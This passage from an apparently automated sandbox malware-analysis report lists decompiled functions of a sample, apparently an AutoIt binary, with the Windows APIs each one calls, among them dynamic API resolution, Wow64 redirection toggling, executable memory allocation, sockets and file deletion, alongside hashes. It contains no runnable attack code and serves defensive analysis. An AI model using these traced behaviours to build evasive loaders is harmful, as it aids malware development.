SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B279E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B279F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B27A03

Strings

msctls_trackbar32, xrefs: 00B279B8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 386203027a2f915ffa1904d0f3049bd90f263fa7a079a0f2a578d0e59260182b
Instruction ID: 26369b9385c80b07a9a963308ecdb62b1eafb3712c6e984bd36bad1ed7fadc50
Opcode Fuzzy Hash: 386203027a2f915ffa1904d0f3049bd90f263fa7a079a0f2a578d0e59260182b
Instruction Fuzzy Hash: D611E332294218BAEF209F74DC05FEB37A9EF89764F010529FA45A60D0DA719851CB64

Function 00AA4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4C2E), ref: 00AA4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4CB5

Strings

GetNativeSystemInfo, xrefs: 00AA4CAF
kernel32.dll, xrefs: 00AA4C9E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
Instruction ID: f15bb070690ea5746233afe372025476d36ba8588a4e06ecbb6ad2e5c8b76aac
Opcode Fuzzy Hash: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
Instruction Fuzzy Hash: 43D01230510723CFD7205F31DA5875676F5AF09B51B11887DA889D71A0DBB0D481C650

Function 00AA4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4CE1,?), ref: 00AA4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4DB4

Strings

kernel32.dll, xrefs: 00AA4D9D
Wow64RevertWow64FsRedirection, xrefs: 00AA4DAE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 047d128711cd5b12841dfd4deab44475ac1efb38dad920e838e616ae2087cc5f
Instruction ID: c5795232a40d972cdabb5e010217a1ea247fc2b499af0523b872d19def116084
Opcode Fuzzy Hash: 047d128711cd5b12841dfd4deab44475ac1efb38dad920e838e616ae2087cc5f
Instruction Fuzzy Hash: 31D01231550713CFD7305F31D80875676E4AF09756B158879E8C6D71A0DBB0D481C650

Function 00AA4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4D2E,?,00AA4F4F,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00AA4D7B
kernel32.dll, xrefs: 00AA4D6A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 79eb8fbd095a18b7b4a44688bf8f9fb780460254d27bbe9c17f48dfd04f2bfd4
Instruction ID: 3b073be476f0e70d6a4712b07c2db7f6cdf9d3ba95c88ca08e42ff00f1b9184d
Opcode Fuzzy Hash: 79eb8fbd095a18b7b4a44688bf8f9fb780460254d27bbe9c17f48dfd04f2bfd4
Instruction Fuzzy Hash: 47D01230510713CFD7305F31D80876676E8AF19752B558879A486D72A0EBB0D480CA50

Function 00B21072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B212C1), ref: 00B21080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B21092

Strings

advapi32.dll, xrefs: 00B2107B
RegDeleteKeyExW, xrefs: 00B2108C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: debc9a22c59059d04991a3007949fbabd901f7e33c3388fa57de8aa3c12d7061
Instruction ID: 4c6855751624977a2d31913d755e54af88b40b87ca99427ea84e83203e832859
Opcode Fuzzy Hash: debc9a22c59059d04991a3007949fbabd901f7e33c3388fa57de8aa3c12d7061
Instruction Fuzzy Hash: 35D01231510723CFD7305F35D818A67B6F4EF15752F118CB9A889D6560DB70C4C0C650

Function 00B193F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B19009,?,00B2F910), ref: 00B19403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B19415

Strings

GetModuleHandleExW, xrefs: 00B1940F
kernel32.dll, xrefs: 00B193FE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 11925f604c7c6b23795f7410b23ffbbe67e3b28a696ec56f6aafbd3d7f2b709c
Instruction ID: ace1f6759e5a6977dadb332eaa69130803bff78d862528173bc6756915578f48
Opcode Fuzzy Hash: 11925f604c7c6b23795f7410b23ffbbe67e3b28a696ec56f6aafbd3d7f2b709c
Instruction Fuzzy Hash: F3D01734510723CFD7309F31DA1979776E5EF09752B51C8BAA886E6660EA70E8C1CA50

Function 00AF76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
Instruction ID: ce7e9906d109e4b6b6bd6fb682b8d6cac65b74c889d9b438a07312d0c5edf253
Opcode Fuzzy Hash: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
Instruction Fuzzy Hash: 2EC14A75A0421AEFCB14DF98C884ABEBBB5FF48750B118598F905EB251D770EE81CB90

Function 00B1E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B1E3D2
CharLowerBuffW.USER32(?,?), ref: 00B1E415

Part of subcall function 00B1DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B1E615
_memmove.LIBCMT ref: 00B1E628

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: eb528196aac534903a6c9e50e558ec5dec12750a3478106aab59e2cf446b3c71
Instruction ID: b101124ec9d9ec40cc3cdaf3a9eacefa3cb3fd89e6e9a1404ebc0abef675e7aa
Opcode Fuzzy Hash: eb528196aac534903a6c9e50e558ec5dec12750a3478106aab59e2cf446b3c71
Instruction Fuzzy Hash: 85C16C71608301DFC714DF28C48096ABBE5FF89714F5489ADF8A99B351D731E986CB82

Function 00B183A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B183D8
CoUninitialize.OLE32 ref: 00B183E3

Part of subcall function 00AFDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFDAC5

VariantInit.OLEAUT32(?), ref: 00B183EE
VariantClear.OLEAUT32(?), ref: 00B186BF

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: df30092202b170553949f4a5154416e065db942646784fd346934ef894398baa
Instruction ID: 731b874c4bafc4d2e315b9fec2762ec90ec45cc51b34b788feb3c78fd5c7c686
Opcode Fuzzy Hash: df30092202b170553949f4a5154416e065db942646784fd346934ef894398baa
Instruction Fuzzy Hash: DFA136752047019FCB10DF24C981A6AB7E5FF89364F54889DF99A9B3A1CB31ED44CB82

Function 00AF7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7C4A
CLSIDFromProgID.OLE32(?,?,00000000,00B2FB80,000000FF,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7C6F
_memcmp.LIBCMT ref: 00AF7C90

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 9fecef371aa3efc5dd1a67aecf4852e69af36c874df674ccbdd2b6fdcda04bd5
Instruction ID: 7da585acfea865391deee75bf0746bd56f9ffe1b1fc578c2e834a089f545764b
Opcode Fuzzy Hash: 9fecef371aa3efc5dd1a67aecf4852e69af36c874df674ccbdd2b6fdcda04bd5
Instruction Fuzzy Hash: EE81D675A00109EFCB04DFD4C984EAEB7B9FF89315F2045A8F516AB250DB71AE06CB60

Function 00AF6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AF6E04
SysAllocString.OLEAUT32(00000000), ref: 00AF6EAD
VariantCopy.OLEAUT32 ref: 00AF6EDC
VariantClear.OLEAUT32(?), ref: 00AF6F03

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 189422963c4f72046c22e5329cef56ca352850f71e2da5893fabe16b21c87526
Instruction ID: e1539318b8a6a7bb93d84f754dece82202c651ba2aa873cc4f3af0b303a79079
Opcode Fuzzy Hash: 189422963c4f72046c22e5329cef56ca352850f71e2da5893fabe16b21c87526
Instruction Fuzzy Hash: 4251843560430A9ADB24AFA5D895A7EB3F5AF49310F20882FF656CB291DF709880DB15

Function 00B29A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0112DB10,?), ref: 00B29AD2
ScreenToClient.USER32(00000002,00000002), ref: 00B29B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B29B72

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7e2f94055ba5c0f6660f8be93f98fac187371732c1f151349305883e585ae231
Instruction ID: bc44d9cdcf88dd0162fc8511362ff51f9d290240b3c5495d727cfddd2f75c392
Opcode Fuzzy Hash: 7e2f94055ba5c0f6660f8be93f98fac187371732c1f151349305883e585ae231
Instruction Fuzzy Hash: 91512F34A00219EFCF14DF68E9849AE7BF5FF55720F1082A9F8599B2A0D730AD41CB90

Function 00B16CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B16CE4
WSAGetLastError.WSOCK32(00000000), ref: 00B16CF4

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B16D58
WSAGetLastError.WSOCK32(00000000), ref: 00B16D64

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 656319a65e00a1ba349b6952e05c175ec18404bf5736d2d1ebe5361b7dfc54f3
Instruction ID: 06b6e1cdf58cd36e3592928e98fa33b8d85dcfbe472471257010e6b1d79fa27a
Opcode Fuzzy Hash: 656319a65e00a1ba349b6952e05c175ec18404bf5736d2d1ebe5361b7dfc54f3
Instruction Fuzzy Hash: 2F41B275B40200AFEB20AF24DD86F7A77E5DB09B14F448068FA599F2D2DB759C018B91

Function 00B1672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B2F910), ref: 00B167BA
_strlen.LIBCMT ref: 00B167EC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: c5d85efc2e9308a6b7fb28a9e6959e620810a1bd1e092ae80f96111d57697055
Instruction ID: 69adac35af4f726b944a4eef433a6a60df35e3d516698f08ef28e8adb2472025
Opcode Fuzzy Hash: c5d85efc2e9308a6b7fb28a9e6959e620810a1bd1e092ae80f96111d57697055
Instruction Fuzzy Hash: BF416D31A00104ABCB14EBA4DDD5EFEB7E9AF49354F5481A9F91A9B2D2DB30AD80C750

Function 00B0BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B0BB09
GetLastError.KERNEL32(?,00000000), ref: 00B0BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B0BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B0BB80

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a12c5afa8eae878567521c74dc421571a30d0881cd5c8e3272c47ea5150a5f49
Instruction ID: ea7db7d5e4c22a9bf0ee0de9c35e6618afe2457cbf35d60b9a320bd788460a1b
Opcode Fuzzy Hash: a12c5afa8eae878567521c74dc421571a30d0881cd5c8e3272c47ea5150a5f49
Instruction Fuzzy Hash: D741E839600611DFCB21EF15C685A5EBBE1EF4A310B198499E84A9B7B2CB35FD01CB91

Function 00B28AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B28B4D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: c1ee6d38f6b6acdf71c3e3418d825a99b913ba539cab5b0641fc55d5ef828f53
Instruction ID: ee0d5adc5f7efbf67ad246c17595e5262fa12556f3f2cc1de06cc3735b52835b
